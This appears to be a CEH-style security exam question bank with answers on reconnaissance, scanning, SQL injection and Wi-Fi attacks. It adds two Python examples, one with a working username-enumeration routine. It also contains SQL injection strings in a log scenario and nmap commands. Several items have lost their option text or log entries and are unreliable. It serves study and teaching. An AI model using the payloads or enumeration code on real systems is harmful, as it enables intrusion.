Which of the following is a wireless security layer where per frame/packet authentication provides protection against MITM attacks and prevents an attacker from sniffing data when two genuine users communicate with each other? - Wireless signal security - Device security - Connection security - End-user protection
Connection security
What type of information is gathered by an attacker through Whois database analysis and tracerouting? - Usernames, passwords, and so on - Background of the organization - DNS records and related information - Publicly available email addresses
DNS records and related information
Which of the following practices makes web applications vulnerable to SQL injection attacks? - Database server running OS commands - Firewalling the SQL server - Implementing consistent coding standards - Minimizing privileges
Database server running OS commands
Which of the following countermeasure helps organizations to prevent information disclosure through banner grabbing? - Disable open relay feature - Display false banners - Disable the DNS zone transfers to the untrusted hosts - Restrict anonymous access through RestrictNullSessAccess parameter from the Windows registry
Display false banners
Steven, a wireless network administrator, has just finished setting up his company's wireless network. He has enabled various security features such as changing the default SSID and enabling strong encryption on the company's wireless router. Steven decides to test the wireless network for confidentiality attacks to check whether an attacker can intercept information sent over wireless associations, whether sent in clear text or encrypted by Wi-Fi protocols. As a part of testing, he tries to capture and decode unprotected application traffic to obtain potentially sensitive information using hardware or software tools such as Ettercap, Kismet, Wireshark, etc. What type of wireless confidentiality attack is Steven trying to do? - WEP Key Cracking - Eavesdropping - Masquerading - Evil twin AP
Eavesdropping
Which of the following types of techniques is used to prevent IP spoofing by blocking outgoing packets with a source address that is not inside? - Access-control lists - Random initial sequence numbers - Ingress filtering - Egress filtering
Egress filtering
Which of the following tools allows an attacker to extract information such as sender identity, mail server, sender's IP address, location, and so on? - Web updates monitoring tools - Email tracking tools - Metadata extraction tools - Website mirroring tools
Email tracking tools
Which of the following is the best practice to follow to secure a system or network against port scanning? - Do not configure firewall and IDS rules to detect and block probes - Ensure that firewall and routers do not block source routing techniques - Ensure that the versions of services running on the ports are non-vulnerable - Allow unwanted services running on the ports and update the service versions
Ensure that the versions of services running on the ports are non-vulnerable
Which of the following best practices should be followed to prevent web-shell installation? - Activate directory browsing in the web server - Establish a reverse proxy service for retrieving resources - Do not use escapeshellarg() or escapeshellcmd() - Enable all PHP functions such as exec(), shell_exec(), show_source(), proc_open(), passthru(), and pcntl_exec()
Establish a reverse proxy service for retrieving resources
Fill in the blank. Posing as an authorized AP by beaconing the WLAN's service set identifier (SSID) to lure users is known as __________. - Masquerading - Man-in-the-Middle Attack - Honeypot AP - Evil Twin AP
Evil Twin AP
John is a pen tester working with an information security consultant based in Paris. As part of a penetration testing assignment, he was asked to perform wireless penetration testing for a large MNC. John knows that the company provides free Wi-Fi access to its employees on the company premises. He sets up a rogue wireless access point with the same SSID as that of the company's Wi-Fi network just outside the company premises. He sets up this rogue access point using the tools that he has and hopes that the employees might connect to it. What type of wireless confidentiality attack is John trying to do? - WEP Cracking - Evil Twin AP - War Driving - KRACK Attack
Evil Twin AP
Which of the following deep and dark web searching tools helps an attacker obtain information about official government or federal databases and navigate anonymously without being traced? - ExoneraTor - Whitepages - Been Verified - Spokeo
ExoneraTor
Which of the following footprinting techniques allows an attacker to gather information passively about the target without direct interaction? - Performing social engineering - Extracting information using Internet archives - Extracting DNS information - Performing traceroute analysis
Extracting information using Internet archives
Which of the following TCP communication flags is set to "1" to announce that no more transmissions will be sent to the remote system and the connection established by the SYN flag is terminated? - RST flag - FIN flag - SYN flag - ACK flag
FIN flag
A pen tester was hired to perform penetration testing on an organization. The tester was asked to perform passive footprinting on the target organization. Which of the following techniques comes under passive footprinting? - Performing traceroute analysis - Finding the top-level domains (TLDs) and sub-domains of a target through web services - Querying published name servers of the target - Performing social engineering
Finding the top-level domains (TLDs) and sub-domains of a target through web services
Which of the following scanning tools is a mobile app for Android and iOS that provides complete network information, such as the IP address, MAC address, device vendor, and ISP location? - Netcraft - Maltego - Fing - Nmap
Fing
In which of the following attacks does an attacker repeatedly send some random input to a target API to generate error messages that reveal critical information? - Login/credential stuffing attack - Malicious input attack - Invalid input attack - Fuzzing
Fuzzing
Robert, a penetration tester, is trying to perform SQL penetration testing on the SQL database of the company to discover coding errors and security loopholes. Robert sends massive amounts of random data to the SQL database through the web application in order to crash the web application of the company. After observing the changes in the output, he comes to know that the web application is vulnerable to SQL injection attacks. Which of the following testing techniques is Robert using to find out the loopholes? - Stored Procedure Injection - Alternate Encodings - Fuzzing Testing - Out of Band Exploitation
Fuzzing Testing
Which of the following footprinting techniques allows an attacker to gather information about a target with direct interaction? - Gathering infrastructure details of the target organization through job sites - Gathering website information using web spidering and mirroring tools - Gathering financial information about the target through financial services - Gathering information using groups, forums, blogs, and NNTP Usenet newsgroups
Gathering website information using web spidering and mirroring tools
Which of the following ping methods is effective in identifying active hosts similar to the ICMP timestamp ping, specifically when the administrator blocks the conventional ICMP ECHO ping? - ICMP address mask ping scan - ICMP ECHO ping sweep - ICMP ECHO ping scan - UDP ping scan
ICMP address mask ping scan
An attacker injects the following SQL query: blah' AND=1( Select Count(*) FROM MY TABLE;-- What is the intention of the attacker? - Identifying the table name - Updating table - Deleting a table - Adding new records
Identifying the table name
Which of the following countermeasures should be followed to protect web applications against broken access control? - Implement a session timeout mechanism - Never limit file permissions to authorized users - Never remove session tokens on the server side on user logout - Implement client-side caching mechanisms
Implement a session timeout mechanism
Which of the following tools is used for gathering email account information from different public sources and checking whether an email was leaked using the haveibeenpwned.com API? - Octoparse - Infoga - Professional Toolset - Metagoofil
Infoga
Shea is a licensed penetration tester. She is working with a client to test their new e-commerce website for SQL injection. After signing the NDA and agreeing on the rules of engagement (RoE), she starts by examining and listing all the input fields on the website. She tries to insert a string value in the CVV2 textbox, where a three-digit number is expected, and she ends up with the below error message. Identify in which stage of the SQL injection methodology is Shea right now. - Information gathering and SQL injection vulnerability detection - Exploit second-order SQL injection - Perform blind SQL injection - Launch SQL injection attacks
Information gathering and SQL injection vulnerability detection.
Which of the following API security risks can be prevented by performing input validation, implementing a parameterized interface for processing inbound API requests, and limiting the number of records returned? - Excessive data exposure - Injection - Mass assignment - Security misconfiguration
Injection
Which of the following attack techniques is used by an attacker to send forged control, management, or data frames over a wireless network to misdirect wireless devices and perform other types of attacks such as DoS? - Confidentiality attack - Integrity attack - Authentication attack - Availability attack
Integrity attack
Which of the following countermeasures should be used to prevent a ping sweep? - Limiting ICMP traffic with access-control lists (ACLs) to the ISP's specific IP addresses - Disabling the firewall - Avoiding the use of DMZ and disallowing commands such as ICMP ECHO_REPLY, HOST UNREACHABLE, and TIME EXCEEDED in DMZ - Allowing connection with any host performing more than 10 ICMP ECHO requests
Limiting ICMP traffic with access-control lists (ACLs) to the ISP's specific IP addresses
Which of the following tools is used by an attacker to create rogue APs and perform sniffing and MITM attacks? - Skyhook - MANA Toolkit - Gobuster - Halberd
MANA Toolkit
Which of the following technologies is an air interface for 4G and 5G broadband wireless communications? - DSSS - MIMO-OFDM - OFDM - FHSS
MIMO-OFDM
Which of the following database management systems contains the system table called "MsysObjects"? - MySQL - Oracle - MSSQL - MS Access
MS Access
Which of the following DNS record types helps in DNS footprinting to determine a domain's mail server? - CNAME - NS - A - MX
MX
In which type of fuzz testing do the current data samples create new test data and the new test data again mutates to generate further random data? - Mutation-based - None of the above - Protocol-based - Generation-based
Mutation-based
Which of the following tools is a web-application security scanner that searches for vulnerabilities to attacks such as clickjacking, SQL injection, and XSS? - Vindicate - Immunity Debugger - Mimikatz - N-Stalker X
N-Stalker X
Which of the following open-source tools would be the best choice to scan a network for potential targets? - Cain & Abel - hashcat - John the Ripper - NMAP
NMAP
Which of the following parameters enable NMAP's operating system detection feature? - NMAP -sC - NMAP -oS - NMAP -O - NMAP -sV
NMAP -O
Which NMAP command combination would let a tester scan every TCP port from a class C network that is blocking ICMP with fingerprinting and service detection? - NMAP -PN -O -sS -p 1-1024 192.168.0/8 - NMAP -P0 -A -sT -p0-65535 192.168.0/16 - NMAP -PN -A -O -sS 192.168.2.0/24 - NMAP -P0 -A -O -p1-65535 192.168.0/24
NMAP -PN -A -O -sS 192.168.2.0/24
Which tool would be used to collect wireless packet data? - Nessus - John the Ripper - Netcat - NetStumbler
NetStumbler
Which statement is TRUE regarding network firewalls in preventing web application attacks? - Network firewalls can prevent attacks because they can detect malicious HTTP traffic - Network firewalls cannot prevent attacks because they are too complex to configure - Network firewalls cannot prevent attacks because ports 80 and 443 must be kept opened - Network firewalls cannot prevent attacks if they are properly configured.
Network firewalls cannot prevent attacks because ports 80 and 443 must be kept opened
Smith, a professional hacker, has targeted an organization. He employed some footprinting tools to scan through all the domains, subdomains, reachable IP addresses, DNS records, and Whois records to perform further attacks. What is the type of information Smith has extracted through the footprinting attempt? - Company's product information - Physical security information - Policy information - Network information
Network information
Which of the following API vulnerabilities allows attackers to gain unauthorized access to API objects or perform actions such as viewing, updating, or deleting? - RBAC privilege escalation - Enumerated resources - No ABAC validation - Business logic flaws
No ABAC validation
Which of the following protocols is used by BlueJacking to send anonymous messages to other Bluetooth-equipped devices? - SDP - LMP - OBEX - L2CAP
OBEX
Which of the following functions can be used by an attacker to link a target SQL server's database to the attacker's own machine and retrieve data from the target SQL server database? - LOAD_FILE() - CONVERT() - INTO OUTFILE() - OPENROWSET()
OPENROWSET()
Which of the following attacks allows an attacker to encode portions of the attack with Unicode, UTF-8, Base64, or URL encoding to hide their attacks and avoid detection? - Network access attack - Cookie snooping - Obfuscation application - Authentication hijacking
Obfuscation application
Which type of antenna is used in wireless communication? - Omnidirectional - Bidirectional - Parabolic - Unidirectional
Omnidirectional
A- Sleep() B- Benchmark() C- mysqlquery() D- Addclashes() - Option B - Option C - Option D - Option A
Option A
Which of the following operators is used for string concatenation in an Oracle database? A- '||' B- ""&"" C- ''+'' D- concat(,) - Option D - Option B - Option C - Option A
Option A
Which of the following DB2 queries allows an attacker to perform column enumeration on a target database? - Option D - Option C - Option B - Option A
Option B
Which of the following SQL injection queries is used by an attacker to extract table column names? - Option A - Option D - Option B - Option C
Option B
Which of the following commands has to be disabled to prevent exploitation at the OS level? - Option C - Option B - Option A - Option D
Option B
Snort is an open-source, free and lightweight network intrusion detection system (NIDS) software for Linux and Windows to detect emerging threats. Snort can be used to detect SQL injection attacks. Identify the correct Snort rule to detect SQL injection attacks. - Option D - Option A - Option C - Option B
Option D
Which of the following MSSQL queries allows an attacker to perform column enumeration on a target database? - Option A - Option D - Option B - Option C
Option D
Which of the following SQL queries is an example of a heavy query used in SQL injection? - Option A - Option C - Option D - Option B
Option D
Which of the following is a Snort rule that is used to detect and block an SQL injection attack? - Option B - Option D - Option C - Option A
Option D
Which of the following queries is used to create a database account in Microsoft SQL Server? - Option D - Option C - Option B - Option A
Option D
In one of the following attacks, an attacker uses different communication channels to perform the attack and obtain results. It is difficult to perform as the attacker needs to communicate with a database server and determine the server features used by a web application. Which is this attack? - In-band SQL injection - Union SQL injection - Out-of-band SQL injection - End-of-line comment
Out-of-band SQL injection
Which of the following is considered as a repair job to a programming problem? - Assessment - Penetration test - Patch - Vulnerability
Patch
Which of the following types of scanning involves the process of checking the services running on a target computer by sending a sequence of messages to break in? - Network scanning - Vulnerability scanning - Port scanning - Banner grabbing
Port scanning
Which of the following IDS/firewall evasion techniques helps an attacker increase their Internet anonymity? - Proxy chaining - Source routing - Source port manipulation - IP address decoy
Proxy chaining
Passive reconnaissance involves collecting information through which of the following? - Social engineering - Email tracking - Traceroute analysis - Publicly accessible sources
Publicly accessible sources
What information is gathered about the victim using email tracking tools? - Recipient's IP address, geolocation, proxy detection, operating system, and browser information - Username of the clients, operating systems, email addresses, and list of software - Information on an organization's web pages since their creation - Targeted contact data, extracts the URL and meta tag for website promotion
Recipient's IP address, geolocation, proxy detection, operating system, and browser information
Which results will be returned with the following Google search query? site:target.com -site:Marketing.target.com accounting - Results matching "accounting" in domain target.com but not on the site Marketing.target.com - Results matching all words in the query - Results from matches on the site marketing.target.com that are in the domain target.com but do not include the word accounting - Results for matches on target.com and Marketing.target.com that include the word "accounting"
Results matching "accounting" in domain target.com but not on the site Marketing.target.com
A security administrator notices that the log file of the company's webserver contains suspicious entries: Based on source code analysis, the analyst concludes that the login.php script is vulnerable to - SQL injection - LDAP injection - command injection - directory traversal
SQL injection
Which of the following scanning techniques is used by an attacker to check whether a machine is vulnerable to UPnP exploits? - SCTP INIT scanning - UDP scanning - SSDP scanning - List scanning
SSDP scanning
Andrew, a professional penetration tester, was hired by ABC Security, Inc., a small IT-based firm in the United States, to conduct a test of the company's wireless network. During the information-gathering process, Andrew discovers that the company is using the 802.11g wireless standard. Using the NetSurveyor Wi-Fi network discovery tool, Andrew starts gathering information about wireless APs. After trying several times, he is not able to detect a single AP. What do you think is the reason behind this? - SSID broadcast feature must be disabled, so APs cannot be detected. - MAC address filtering feature must be disabled on APs or router. - Andrew must be doing something wrong, as there is no reason for him to not detect access points. - NetSurveyor does not work against 802.11g.
SSID broadcast feature must be disabled, so APs cannot be detected
Which of the following protocols provides transport-level security for API messages to ensure confidentiality through encryption and integrity through signature? - SSL - FTP - NTP - IMAP
SSL
Which of the following tools is a network scanner for iPhone and iPad that is used to scan LAN, Wi-Fi networks, websites, open ports, and network devices and can support several networking protocols? - Scany - Whonix - Psiphon - Tails
Scany
Which of the following parameters defines the level of access to an application to redirect a user agent to the authorization server? - State - Scope - Response_type - Redirect_uri
Scope
Sean works as a professional ethical hacker and penetration tester. He is assigned a project for information gathering on a client's network. He started penetration testing and was trying to find out the company's internal URLs, looking for any information about the different departments and business units. Sean was unable to find any information. What should Sean do to get the information he needs? - Sean should use email tracking tools - Sean should use WayBackMachine in Archive.org - Sean should use website mirroring tools - Sean should use Sublist3r tool
Sean should use Sublist3r tool
What is the output returned by search engines when extracting critical details about a target from the Internet? - Advanced search operators - Operating systems, location of web servers, users, and passwords - Search engine results pages ("SERPs") - Open ports and services
Search engine results pages ("SERPs")
Which of the following countermeasures should be followed to defend against watering-hole attacks? - Enable third-party content such as advertising services, which track user activities - Never run the web browser in a virtual environment - Secure the DNS server to prevent attackers from redirecting the user to a new location - Use browser plug-ins that allow HTTP redirects
Secure the DNS server to prevent attackers from redirecting the user to a new location
In which of the following processes do the station and access point use the same WEP key to provide authentication, which means that this key should be enabled and configured manually on both the access point and the client? - WPA encryption - Shared key authentication process - WEP encryption - Open-system authentication process
Shared key authentication process
Which of the following activities of a user on social networking sites helps an attacker footprint or collect the identity of the user's family members, the user's interests, and related information? - Creating events - Maintaining the profile - Sharing photos and videos - Playing games and joining groups
Sharing photos and videos
Robert, an attacker, targeted a high-level executive of an organization and wanted to obtain information about the executive on the Internet. He employed a tool through which he discovered the target user on various social networking sites, along with the complete URL. What is the tool used by Robert in the above scenario? - Sublist3r - Sherlock - OpUtils - BeRoot
Sherlock
Sean works as a penetration tester in ABC firm. He was asked to gather information about the target company. Sean begins with social engineering by following these steps:
Secretly observes the target to gain critical information
Looks at an employee's password or PIN code with the help of binoculars or a low-power telescope
Based on the above description, identify the social engineering technique. - Phishing - Shoulder surfing - Dumpster diving - Tailgating
Shoulder surfing
Smith works as a professional Ethical Hacker with a large MNC. He is a CEH certified professional and was following the CEH methodology to perform the penetration testing. He is assigned a project for information gathering on a client's network. He started penetration testing and was trying to find out the company's internal URLs (mostly by trial and error), looking for any information about the different departments and business units. Smith was unable to find any information. What should Smith do to get the information he needs? - Smith should use online services such as netcraft.com to find the company's internal URLs - Smith should use WayBackMachine in Archive.org to find the company's internal URLs - Smith should use email tracking tools such as eMailTrackerPro to find the company's internal URLs - Smith should use website mirroring tools such as HTTrack Website Copier to find the company's internal URLs
Smith should use online services such as netcraft.com to find the company's internal URLs
Which of the following is the direct approach technique that serves as the primary source for attackers to gather competitive intelligence? - Search engines, Internet, and online databases - Social media postings - Social engineering - Support threads and reviews
Social engineering
In website footprinting, which of the following information is acquired by the attacker when they examine the cookies set by the server? - Software in use and its behavior - Comments present in the source code - Contact details of the web developer or admin - File-system structure and script type
Software in use and its behavior
Which of the following is used to detect bugs and irregularities in web applications? - Source code review - Generation-based fuzz testing - Protocol-based fuzz testing - Mutation-based fuzz testing
Source code review
In one of the following features of the RESTful API, the client end stores the state of the session, and the server is restricted to save data during request processing. Which is this feature? - Code on demand - Cacheable - Stateless - Uniform interface
Stateless
A security engineer is attempting to perform scanning on a company's internal network to verify the security policies of their networks. The engineer uses the following NMAP command: nmap -n -sS -P0 -p 80 ***.***.**.**. What type of scan is this? - Stealth scan - Intense scan - Comprehensive scan - Quick scan
Stealth scan
Which of the following scans detects when a port is open after completing the three-way handshake, establishes a full connection, and closes the connection by sending an RST packet? - ACK flag probe scan - IDLE/IPID header scan - Stealth scan - TCP connect scan
TCP connect scan
Which of the following is the active banner grabbing technique used by an attacker to determine the OS running on a remote target system? - TCP sequence ability test - Sniffing of network traffic - Banner grabbing from page extensions - Banner grabbing from error messages
TCP sequence ability test
Which of the following encryption techniques is used in WPA? - DES - RSA - TKIP - AES
TKIP
In which of the following attacks does an attacker use a conditional OR clause in such a way that the condition of the WHERE clause will always be true? - Tautology - End-of-line comment - Illegal/logically incorrect query - UNION SQL injection
Tautology
Which of the following practices helps developers defend against SQL injection attacks? - Always construct dynamic SQL with concatenated input values - Build Transact-SQL statements directly from user input - Test the content of string variables and accept only expected values - Allow entries that contain binary data, escape sequences, and comment characters
Test the content of string variables and accept only expected values
Which of the following countermeasures prevents buffer overruns? - Test the size and data type of the input and enforce appropriate limits. - Apply the least privilege rule to run the applications that access the DBMS. - Keep untrusted data separate from commands and queries. - Use the most restrictive SQL account types for applications.
Test the size and data type of the input and enforce appropriate limits.
If your web application sets any cookie with a secure attribute, what does this mean? - The cookie cannot be accessed by JavaScript - Cookies will be sent cross-domain - The client will send the cookie only over an HTTPS connection - The cookie will not be sent cross-domain
The client will send the cookie only over an HTTPS connection
Bank of Timbuktu is a medium-sized, regional financial institution in Timbuktu. The bank has deployed a new Internet-accessible Web application recently. Customers can access their account balances, transfer money between accounts, pay bills and conduct online financial business using a Web browser. John Stevens is in charge of information security at Bank of Timbuktu. After one month in production, several customers have complained about the Internet enabled banking application. Strangely, the account balances of many of the bank's customers had been changed! However, money hasn't been removed from the bank; instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries:
Attempted login of unknown user: johnm
Attempted login of unknown user: susaR
Attempted login of unknown user: sencat
Attempted login of unknown user: pete";
Attempted login of unknown user: ' or 1=1-
Attempted login of unknown user: '; drop table logins-
Login of user jason, sessionID= 0x75627578626F6F6B
Login of user daniel, sessionID= 0x98627579539E13BE
Login of user rebecca, sessionID= 0x9062757944CCB811
Login of user mike, sessionID= 0x9062757935FB5C64
Transfer Funds user jason
Pay Bill user mike
Logout of user mike
What kind of attack did the Hacker attempt to carry out at the bank? - The hacker first attempted logins with suspected user names, and then used SQL injection to gain access to valid bank login IDs. - The hacker attempted session hijacking, in which the hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID, and took over Jason's session. - The hacker used a generator module to pass results to the webserver and exploited web application CGI vulnerability. - Brute force attack in which the hacker attempted guessing login IDs and passwords from password-cracking tools.
The hacker first attempted logins with suspected user names, and then used SQL injection to gain access to valid bank login IDs.
A penetration tester is conducting a port scan on a specific host. The tester found several open ports that were confusing in concluding the operating system (OS) version installed. Considering the NMAP result below, which of the following is likely to be installed on the target machine by the OS?
Starting NMAP 7.70 at 2018-03-15 11:06
NMAP scan report for 172.16.40.65
Host is up (1.00s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http
139/tcp open netbios-ssn
515/tcp open
631/tcp open ipp
9100/tcp open
MAC Address: 00:00:48:0D:EE:89
- The host is likely a Linux machine. - The host is likely a Windows machine. - The host is likely a router. - The host is likely a printer.
The host is likely a printer.
What is the main difference between a "Normal" SQL injection and a "Blind" SQL injection vulnerability? - The attack is called "Blind" because, although the application properly filters user input, it is still vulnerable to code injection. - The vulnerable application does not display errors with information about the injection results to the attacker. - A successful attack does not show an error message to the administrator of the affected application. - The request to the webserver is not visible to the administrator of the vulnerable application.
The vulnerable application does not display errors with information about the injection results to the attacker.
Which NMAP feature can a tester implement or adjust while scanning for open ports to avoid detection by the network's IDS? - Fingerprinting to identify which operating systems are running on the network - Timing options to slow the speed that the port scan is conducted - ICMP ping sweep to determine which hosts on the network are not available - Traceroute to control the path of the packets sent during the scan
Timing options to slow the speed that the port scan is conducted
Which of the following search engine tools helps an attacker use an image as a search query and track the original source and details of images, such as photographs, profile pictures, and memes? - Mention - TinEye - Intelius - Sublist3r
TinEye
Which of the following tools are useful in extracting information about the geographical location of routers, servers, and IP devices in a network? - Traceroute tools - Email tracking tools - Website mirroring tools - Web spidering tools
Traceroute tools
In a LAN-to-LAN wireless network, the APs provide wireless connectivity to local computers, and computers on different networks can be interconnected. - True - False
True
SQL injection attacks do not exploit a specific software vulnerability; instead they target websites that do not follow secure coding practices for accessing and manipulating data stored in a relational database. - False - True
True
Which of the following issues can be detected when testers send long strings of junk data, similar to strings for detecting buffer overruns that throw SQL errors on a page? - SQL injection - Truncation - SQL modification - Input sanitization
Truncation
InfoTech Security hired a penetration tester, Sean, to do physical penetration testing. On the first day of his assessment, Sean goes to the company posing as a repairman and starts checking trash bins to collect sensitive information. What is Sean trying to do? - Trying to attempt social engineering by eavesdropping - Trying to attempt social engineering using phishing - Trying to attempt social engineering by shoulder surfing - Trying to attempt social engineering by dumpster diving
Trying to attempt social engineering by dumpster diving
Which of the following practices is NOT a preventive measure against KRACK attacks? - Avoid using public Wi-Fi networks - Always enable the HTTPS Everywhere extension - Enable two-factor authentication - Turn off auto-updates for all wireless devices
Turn off auto-updates for all wireless devices
While performing a UDP scan of a subnet, you receive an ICMP reply of Type 3/Code 3 for all the probes you have sent out. What is the most likely cause of this? - The firewall is dropping the packets. - UDP port is open. - The host does not respond to ICMP packets. - UDP port is closed.
UDP port is closed.
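The port-state logic behind this answer, as an added example that is not part of the original question set: an ICMP Destination Unreachable (Type 3) with Code 3 (Port Unreachable) is the host saying nothing listens on that UDP port, so the port is closed; other Type 3 codes (1, 2, 9, 10, 13) come from routers or firewalls and are reported as filtered, a UDP datagram back means open, and silence is ambiguous (open|filtered). The classifier below follows that scheme as documented for Nmap's -sU; the ICMP messages and the reply table are constructed inline, and the build_icmp/classify_udp_port names are this example's own.

```python
import struct

# ICMP values from RFC 792; only what a UDP port scanner needs.
ICMP_DEST_UNREACH = 3
CODE_PORT_UNREACH = 3
# Destination-unreachable codes that mean a router or firewall refused the
# probe (host/protocol unreachable, administratively prohibited), which a
# scanner reports as "filtered" rather than "closed".
FILTERED_CODES = {1, 2, 9, 10, 13}


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over the whole ICMP message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(icmp_type: int, code: int, rest: bytes = b"\x00" * 4) -> bytes:
    """Construct an 8-byte ICMP header with a valid checksum (test input only)."""
    header = struct.pack("!BBH", icmp_type, code, 0) + rest
    return struct.pack("!BBH", icmp_type, code, icmp_checksum(header)) + rest


def parse_icmp_header(message: bytes) -> tuple:
    """Return (type, code) after checking the checksum; a valid message sums to 0."""
    if len(message) < 8:
        raise ValueError("ICMP header must be at least 8 bytes")
    if icmp_checksum(message) != 0:
        raise ValueError("bad ICMP checksum")
    icmp_type, code, _ = struct.unpack("!BBH", message[:4])
    return icmp_type, code


def classify_udp_port(reply) -> str:
    """Classify one UDP probe.

    reply is None when nothing arrived before the timeout, ("udp", payload)
    when the service answered, or ("icmp", message) for an ICMP error.
    """
    if reply is None:
        # Open services often ignore junk and firewalls drop silently,
        # so no answer cannot be resolved further without more probes.
        return "open|filtered"
    proto, data = reply
    if proto == "udp":
        return "open"
    if proto != "icmp":
        raise ValueError("unexpected reply protocol %r" % proto)
    icmp_type, code = parse_icmp_header(data)
    if icmp_type == ICMP_DEST_UNREACH and code == CODE_PORT_UNREACH:
        return "closed"        # the host itself says nothing listens there
    if icmp_type == ICMP_DEST_UNREACH and code in FILTERED_CODES:
        return "filtered"      # something in the path rejected the probe
    return "open|filtered"


def scan_summary(replies: dict) -> dict:
    """Map port -> state for a table of replies."""
    return {port: classify_udp_port(r) for port, r in replies.items()}


if __name__ == "__main__":
    # Constructed replies; port 161 is the situation the question describes.
    sample = {
        53: ("udp", b"\x00\x00\x81\x80"),   # DNS answered: open
        161: ("icmp", build_icmp(3, 3)),     # port unreachable: closed
        500: ("icmp", build_icmp(3, 13)),    # admin prohibited: filtered
        1900: None,                          # silence: open|filtered
    }
    for port, state in scan_summary(sample).items():
        print(port, state)
```

If every probe in a subnet comes back Type 3/Code 3, the hosts are reachable and answering; a firewall that drops packets would produce silence, not port-unreachable errors.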
Which of the following countermeasures is used to avoid banner grabbing attacks? - Enable the details of the vendor and version in the banners - Never display false banners to mislead or deceive attackers - Turn on unnecessary services on the network host to limit information disclosure - Use ServerMask tools to disable or change banner information
Use ServerMask tools to disable or change banner information
Which of the following countermeasures should be followed to protect web applications from command injection attacks? - Use modular shell disassociation from the kernel - Never use parameterized SQL queries - Never use language-specific libraries
Use modular shell disassociation from the kernel
An attacker tries to enumerate the username and password of an account named "rini Mathew" on wordpress.com. On the first attempt, the attacker tried to login as "rini.mathews," which resulted in the login failure message "invalid email or username." On the second attempt, the attacker tried to login as "rinimathews," which resulted in a message stating that the password entered for the username was incorrect, thus confirming that the username "rinimathews" exists. What is the attack that is performed by the attacker? - Brute-forcing - Man-in-the-middle - Username enumeration - Phishing
Username enumeration
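The oracle in this scenario, shown as an added example rather than anything from wordpress.com or the original question set: a login that answers "invalid email or username" for unknown names and a different message for wrong passwords lets an attacker confirm accounts one probe at a time. The user store, messages and function names below are constructed for the example; the hardened variant returns one message and always runs the password hash so the response time does not leak the same bit.

```python
import hashlib
import hmac
import os


def _derive(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


# Constructed user store: username -> (salt, derived key). One real account.
_SALT = os.urandom(16)
USERS = {"rinimathews": (_SALT, _derive("correct-horse-battery", _SALT))}
# Decoy record so the hardened path does identical work for unknown names.
_DUMMY = (os.urandom(16), os.urandom(32))


def login_verbose(username: str, password: str) -> str:
    """Vulnerable: the failure message depends on whether the username exists."""
    if username not in USERS:
        return "invalid email or username"
    salt, key = USERS[username]
    if not hmac.compare_digest(key, _derive(password, salt)):
        return "the password you entered for the username is incorrect"
    return "login ok"


def login_generic(username: str, password: str) -> str:
    """Hardened: one failure message, and the hash is computed either way."""
    salt, key = USERS.get(username, _DUMMY)
    password_ok = hmac.compare_digest(key, _derive(password, salt))
    if username in USERS and password_ok:
        return "login ok"
    return "invalid username or password"


def enumerate_usernames(login, candidates, probe_password="not-the-password"):
    """Attacker side: a candidate is confirmed when its failure message differs
    from the one returned for a name that certainly does not exist."""
    baseline = login("no-such-user-" + os.urandom(4).hex(), probe_password)
    return [u for u in candidates if login(u, probe_password) != baseline]


if __name__ == "__main__":
    guesses = ["rini.mathews", "rinimathews"]
    print("verbose:", enumerate_usernames(login_verbose, guesses))
    print("generic:", enumerate_usernames(login_generic, guesses))
```

The same comparison works on any observable difference, not just the message text: HTTP status code, response length, a redirect versus a rendered page, or timing. Registration and password-reset forms are usually noisier than the login form itself.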
While performing data validation of web content, a security technician is required to restrict malicious input. Which of the following processes is an efficient way of restricting malicious input? - Validate web content input with scanning tools - Validate web content input for extraneous queries - Validate web content input for query strings - Validate web content input for type, length, and range
Validate web content input for type, length, and range
Q 175 - Variations - Declare variables - Case variation - Null byte
Variations
Which of the following consists of 40/104 bit Encryption Key Length? - WEP - RSA - WPA - WPA2
WEP
Which of the following tools consists of a publicly available set of databases that contain personal information of domain owners? - Traceroute tools - Metadata extraction tools - WHOIS lookup tools - Web spidering tools
WHOIS lookup tools
Donald works as a network administrator with ABCSecurity, Inc., a small IT based firm in San Francisco. He was asked to set up a wireless network in the company premises which provides strong encryption to protect the wireless network against attacks. After doing some research, Donald decided to use a wireless security protocol which has the following features: provides stronger data protection and network access control; uses the AES encryption algorithm for strong wireless encryption; uses Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP). Which of the following wireless security protocols did Donald decide to use? - TKIP - WEP - WPA - WPA2
WPA2
Which of the following encryption methods has KRACK vulnerabilities that make it susceptible to packet sniffing, connection hijacking, malware injection, and decryption attacks? - WEP - WPA2 - EAP - WPA
WPA2
Which of the following Wi-Fi security protocols uses GCMP-256 for encryption and HMAC-SHA-384 for authentication? - CCMP - PEAP - WPA3 - WEP
WPA3
Which of the following Wi-Fi security protocols uses GCMP-256 for encryption and HMAC-SHA-384 for authentication? - WPA3 - WEP - CCMP - PEAP
WPA3
Which of the following security standards contains the Dragonblood vulnerabilities that help attackers recover keys, downgrade security mechanisms, and launch various information-theft attacks? - WPA3 - WPA2 - WEP - WPA
WPA3
Which of the following metadata formats does the SOAP API use to reveal a large amount of technical information such as paths, parameters, and message formats? - Swagger - WSDL/XML-Schema - I/O Docs - API-Blueprint
WSDL/XML-Schema
In which of the following techniques does an attacker draw symbols in public places to advertise open Wi-Fi networks? - WarWalking - WarFlying - WarDriving - WarChalking
WarChalking
In which of the following techniques does an attacker draw symbols in public places to advertise open Wi-Fi networks? - Warflying - Wardriving - Warwalking - Warchalking
Warchalking
Which of the following automatically discover hidden content and functionality by parsing HTML form and client-side JavaScript requests and responses? - Proxies - Web spiders - Firewalls - Banners
Web spiders
Which of the following APIs is a user-defined HTTP callback or push API that is raised based on events triggered, such as receiving a comment on a post or pushing code to the registry? - Webhook - SOAP API - RESTful API - REST API
Webhook
Which of the following is a query and response protocol used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system? - Whois lookup - TCP/IP - Traceroute - DNS lookup
Whois lookup
